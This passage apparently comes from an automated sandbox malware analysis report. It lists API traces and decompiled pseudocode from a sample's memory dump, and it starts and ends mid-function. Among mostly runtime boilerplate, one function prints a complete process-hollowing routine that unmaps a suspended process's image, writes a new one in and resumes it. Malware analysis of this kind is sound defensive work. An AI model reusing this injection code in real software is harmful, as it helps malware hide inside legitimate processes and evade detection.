      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
    				void* _t3;
    
    				_push(0x454880);
    				_push(0x101); // executed
    				L0040C510(); // executed
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSAStartup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D1C() {
    				struct HINSTANCE__* _t24;
    				void* _t32;
    				intOrPtr _t35;
    				void* _t45;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L3:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t32);
    						 *0x419004 = 0;
    					}
    					L5:
    					while(1) {
    						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    							 *0x0045463C = 0;
    						}
    						E00403AB8();
    						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    							_t14 =  *0x00454640;
    							if( *0x00454640 != 0) {
    								E0040532C(_t14);
    								_t35 =  *((intOrPtr*)(0x454640));
    								_t7 = _t35 + 0x10; // 0x400000
    								_t24 =  *_t7;
    								_t8 = _t35 + 4; // 0x400000
    								if(_t24 !=  *_t8 && _t24 != 0) {
    									FreeLibrary(_t24);
    								}
    							}
    						}
    						E00403A90();
    						if( *((char*)(0x454658)) == 1) {
    							 *0x00454654();
    						}
    						if( *((char*)(0x454658)) != 0) {
    							E00403C60();
    						}
    						if( *0x454630 == 0) {
    							if( *0x454024 != 0) {
    								 *0x454024();
    							}
    							ExitProcess( *0x419000); // executed
    						}
    						memcpy(0x454630,  *0x454630, 0xb << 2);
    						_t45 = _t45 + 0xc;
    						0x419000 = 0x419000;
    					}
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L3;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D14() {
    				intOrPtr* _t13;
    				struct HINSTANCE__* _t27;
    				void* _t36;
    				intOrPtr _t39;
    				void* _t52;
    
    				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L5:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t36);
    						 *0x419004 = 0;
    					}
    					L7:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t17 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t17);
    							_t39 =  *((intOrPtr*)(0x454640));
    							_t7 = _t39 + 0x10; // 0x400000
    							_t27 =  *_t7;
    							_t8 = _t39 + 4; // 0x400000
    							if(_t27 !=  *_t8 && _t27 != 0) {
    								FreeLibrary(_t27);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t52 = _t52 + 0xc;
    					0x419000 = 0x419000;
    					goto L7;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L5;
    				}
    			}









    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403D18() {
    				struct HINSTANCE__* _t26;
    				void* _t35;
    				intOrPtr _t38;
    				void* _t51;
    
    				if( *0x00454658 != 0 ||  *0x454040 == 0) {
    					L4:
    					if( *0x419004 != 0) {
    						E00403C04();
    						E00403C90(_t35);
    						 *0x419004 = 0;
    					}
    					L6:
    					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
    						 *0x0045463C = 0;
    					}
    					E00403AB8();
    					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
    						_t16 =  *0x00454640;
    						if( *0x00454640 != 0) {
    							E0040532C(_t16);
    							_t38 =  *((intOrPtr*)(0x454640));
    							_t7 = _t38 + 0x10; // 0x400000
    							_t26 =  *_t7;
    							_t8 = _t38 + 4; // 0x400000
    							if(_t26 !=  *_t8 && _t26 != 0) {
    								FreeLibrary(_t26);
    							}
    						}
    					}
    					E00403A90();
    					if( *((char*)(0x454658)) == 1) {
    						 *0x00454654();
    					}
    					if( *((char*)(0x454658)) != 0) {
    						E00403C60();
    					}
    					if( *0x454630 == 0) {
    						if( *0x454024 != 0) {
    							 *0x454024();
    						}
    						ExitProcess( *0x419000); // executed
    					}
    					memcpy(0x454630,  *0x454630, 0xb << 2);
    					_t51 = _t51 + 0xc;
    					0x419000 = 0x419000;
    					goto L6;
    				} else {
    					do {
    						 *0x454040 = 0;
    						 *((intOrPtr*)( *0x454040))();
    					} while ( *0x454040 != 0);
    					goto L4;
    				}
    			}








    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405824(intOrPtr* __eax, void* __edx) {
    				char _v1032;
    				int _t13;
    				void* _t22;
    
    				_t21 = __edx;
    				if(__eax != 0) {
    					if( *(__eax + 4) >= 0x10000) {
    						return E00404080(__edx,  *(__eax + 4));
    					}
    					_t13 = LoadStringA(E00404DCC( *((intOrPtr*)( *__eax))),  *(__eax + 4),  &_v1032, 0x400); // executed
    					return E00403F78(_t21, _t13, _t22);
    				}
    				return __eax;
    			}







    APIs
    • LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00404D84(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					GetModuleFileNameA( *(__eax + 4),  &_v272, 0x105);
    					_t14 = E00404FC0(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
    					}
    				}
    				return  *((intOrPtr*)(_t16 + 0x10));
    			}









    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00404DA2
      • Part of subcall function 00404FC0: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
      • Part of subcall function 00404FC0: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
      • Part of subcall function 00404FC0: RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
      • Part of subcall function 00404FC0: RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
      • Part of subcall function 00404FC0: GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
      • Part of subcall function 00404FC0: GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
      • Part of subcall function 00404FC0: lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
      • Part of subcall function 00404FC0: lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
      • Part of subcall function 00404FC0: LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 37%
    			E00402670(void* __eax) {
    				void* _t3;
    				void* _t6;
    
    				if(__eax <= 0) {
    					_t6 = 0;
    				} else {
    					_t3 =  *0x41903c(); // executed
    					_t6 = _t3;
    					if(_t6 == 0) {
    						E00402778(1);
    					}
    				}
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00403B78(intOrPtr __eax, intOrPtr __edx) {
    				void* _t6;
    				intOrPtr _t7;
    
    				_t7 = __edx;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454638 = __eax;
    				 *0x45463c = 0;
    				 *0x454640 = __edx;
    				_t1 = _t7 + 4; // 0x400000
    				 *0x45402c =  *_t1;
    				E00403A70();
    				 *0x454034 = 0; // executed
    				_t6 = E00403B18(); // executed
    				return _t6;
    			}






    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd

    Non-executed Functions

    C-Code - Quality: 76%
    			E00417F5C(intOrPtr __eax, void* __ebx, short* __ecx, char __edx, void* __edi, void* __esi, void* __fp0, intOrPtr* _a4) {
    				intOrPtr _v8;
    				char _v12;
    				CONTEXT* _v16;
    				void* _v20;
    				void _v24;
    				void _v28;
    				long _v32;
    				struct _PROCESS_INFORMATION _v48;
    				struct _STARTUPINFOA _v116;
    				CHAR* _t95;
    				short* _t171;
    				intOrPtr _t182;
    				intOrPtr _t189;
    				intOrPtr* _t194;
    				short* _t196;
    				void* _t197;
    				void* _t199;
    				void* _t200;
    				intOrPtr _t201;
    				void* _t215;
    
    				_t215 = __fp0;
    				_t199 = _t200;
    				_t201 = _t200 + 0xffffff90;
    				_t196 = __ecx;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t199);
    				_push(0x418218);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t201;
    				if(_v12 != 0) {
    					_push(0x418230);
    					_push(_v8);
    					_push(0x41823c);
    					_push(_v12);
    					E00404208();
    				}
    				 *_a4 = 0;
    				_t171 = _t196;
    				if( *_t171 == 0x5a4d) {
    					_t194 =  *((intOrPtr*)(_t171 + 0x3c)) + _t196;
    					if( *_t194 == 0x4550) {
    						E00402B60( &_v116, 0x44);
    						E00402B60( &_v48, 0x10);
    						_v116.cb = 0x44;
    						_v116.dwFlags = 1;
    						_v116.wShowWindow = 0;
    						_t95 = E00404348(_v12);
    						if(CreateProcessA(E00404348(_v8), _t95, 0, 0, 0, 4, 0, 0,  &_v116,  &_v48) != 0) {
    							 *_a4 = _v48.dwProcessId;
    							_v16 = E00417F28( &_v20);
    							if(_v16 != 0) {
    								_v16->ContextFlags = 0x10007;
    								if(GetThreadContext(_v48.hThread, _v16) != 0) {
    									ReadProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v24, 4,  &_v32);
    									if( *(_t194 + 0x34) != _v24) {
    										_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    									} else {
    										if(NtUnmapViewOfSection(_v48.hProcess,  *(_t194 + 0x34)) != 0) {
    											_v28 = VirtualAllocEx(_v48.hProcess, 0,  *(_t194 + 0x50), 0x3000, 0x40);
    										} else {
    											_v28 = VirtualAllocEx(_v48.hProcess,  *(_t194 + 0x34),  *(_t194 + 0x50), 0x3000, 0x40);
    										}
    									}
    									_t210 = _v28;
    									if(_v28 != 0) {
    										_t197 = E00417EA4(_t196, _t210);
    										_t125 = _v28;
    										if( *(_t194 + 0x34) != _v28) {
    											E00417E10(_t215, _t197, _t194, _t125 -  *(_t194 + 0x34));
    											 *(_t194 + 0x34) = _v28;
    											E00405DE0( *((intOrPtr*)(_t171 + 0x3c)) + _t197, _t194);
    										}
    										WriteProcessMemory(_v48.hProcess, _v28, _t197,  *(_t194 + 0x50),  &_v32);
    										WriteProcessMemory(_v48.hProcess, _v16->Ebx + 8,  &_v28, 4,  &_v32);
    										_v16->Eax =  *((intOrPtr*)(_t194 + 0x28)) + _v28;
    										SetThreadContext(_v48.hThread, _v16);
    										ResumeThread(_v48.hThread);
    										WaitForSingleObject(_v48.hThread, 0xffffffff);
    										_push(_t199);
    										_push(0x4181d0);
    										_push( *[fs:eax]);
    										 *[fs:eax] = _t201;
    										TerminateThread(_v48.hProcess, 0);
    										CloseHandle(_v48.hProcess);
    										_pop(_t189);
    										 *[fs:eax] = _t189;
    									}
    								}
    								VirtualFree(_v20, 0, 0x8000);
    							}
    							if( *_a4 == 0) {
    								TerminateProcess(_v48, 0);
    							}
    						}
    					}
    				}
    				_pop(_t182);
    				 *[fs:eax] = _t182;
    				_push(E0041821F);
    				return E00403EAC( &_v12, 2);
    			}
























    APIs
    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F28: VirtualAlloc.KERNEL32(00000000,000000D0,00001000,00000004,?,00418048,00000000,00418218), ref: 00417F39
    • GetThreadContext.KERNEL32(?,00000000), ref: 00418066
    • ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
    • NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
    • WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
    • WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
    • SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
    • ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
    • TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
    • CloseHandle.KERNEL32(?), ref: 004181C1
    • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
    • TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00404E08(char* __eax, intOrPtr __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				struct _WIN32_FIND_DATAA _v334;
    				char _v595;
    				void* _t45;
    				char* _t54;
    				char* _t64;
    				void* _t83;
    				intOrPtr* _t84;
    				char* _t90;
    				struct HINSTANCE__* _t91;
    				char* _t93;
    				void* _t94;
    				char* _t95;
    				void* _t96;
    
    				_v12 = __edx;
    				_v8 = __eax;
    				_v16 = _v8;
    				_t91 = GetModuleHandleA("kernel32.dll");
    				if(_t91 == 0) {
    					L4:
    					if( *_v8 != 0x5c) {
    						_t93 = _v8 + 2;
    						goto L10;
    					} else {
    						if( *((char*)(_v8 + 1)) == 0x5c) {
    							_t95 = E00404DF4(_v8 + 2);
    							if( *_t95 != 0) {
    								_t14 = _t95 + 1; // 0x1
    								_t93 = E00404DF4(_t14);
    								if( *_t93 != 0) {
    									L10:
    									_t83 = _t93 - _v8;
    									_push(_t83 + 1);
    									_push(_v8);
    									_push( &_v595);
    									L00401248();
    									while( *_t93 != 0) {
    										_t90 = E00404DF4(_t93 + 1);
    										_t45 = _t90 - _t93;
    										if(_t45 + _t83 + 1 <= 0x105) {
    											_push(_t45 + 1);
    											_push(_t93);
    											_push( &(( &_v595)[_t83]));
    											L00401248();
    											_t94 = FindFirstFileA( &_v595,  &_v334);
    											if(_t94 != 0xffffffff) {
    												FindClose(_t94);
    												_t54 =  &(_v334.cFileName);
    												_push(_t54);
    												L00401250();
    												if(_t54 + _t83 + 1 + 1 <= 0x105) {
    													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
    													_push(0x105 - _t83 - 1);
    													_push( &(_v334.cFileName));
    													_push( &(( &(( &_v595)[_t83]))[1]));
    													L00401248();
    													_t64 =  &(_v334.cFileName);
    													_push(_t64);
    													L00401250();
    													_t83 = _t83 + _t64 + 1;
    													_t93 = _t90;
    													continue;
    												}
    											}
    										}
    										goto L17;
    									}
    									_push(_v12);
    									_push( &_v595);
    									_push(_v8);
    									L00401248();
    								}
    							}
    						}
    					}
    				} else {
    					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
    					if(_t84 == 0) {
    						goto L4;
    					} else {
    						_push(0x105);
    						_push( &_v595);
    						_push(_v8);
    						if( *_t84() == 0) {
    							goto L4;
    						} else {
    							_push(_v12);
    							_push( &_v595);
    							_push(_v8);
    							L00401248();
    						}
    					}
    				}
    				L17:
    				return _v16;
    			}




















    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
    • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
    • lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
    • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404DF4: CharNextA.USER32(?), ref: 00404DF7
    • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
    • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
    • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
    • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
    • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
    • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.1469435323.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
